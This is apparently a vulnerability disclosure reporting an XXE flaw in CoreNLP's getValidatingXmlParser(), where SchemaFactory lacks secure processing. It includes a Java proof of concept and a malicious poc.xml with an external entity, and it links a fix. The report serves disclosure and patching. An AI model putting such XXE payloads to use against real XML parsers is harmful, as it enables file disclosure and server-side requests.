When a malicious schema XML file is passed to getValidatingXmlParser(), the parser is vulnerable to XXE when the SchemaFactory parses the schema XML file.
public static DocumentBuilder getValidatingXmlParser(File schemaFile) {
...
SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
Schema schema = factory.newSchema(schemaFile);
SchemaFactory is created without FEATURE_SECURE_PROCESSING set, leaving it vulnerable to XXE when it creates a new schema from a schemaFile.
By default, SchemaFactory is vulnerable to XXE as shown by the example below:
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Schema;
import javax.xml.XMLConstants;
import java.io.File;
public class Poc {
public static void main(String[] args) {
try {
SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
Schema schema = factory.newSchema(new File("poc.xml"));
} catch (Exception e) {
e.printStackTrace();
}
}
}
poc.xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://127.0.0.1/">]>
<foo>&xxe;</foo>
https://github.com/stanfordnlp/corenlp/compare/HEAD…haxatron:fix-xxe-2
This vulnerability is capable of XXE when a developer uses this function to validate XML files against malicious schema files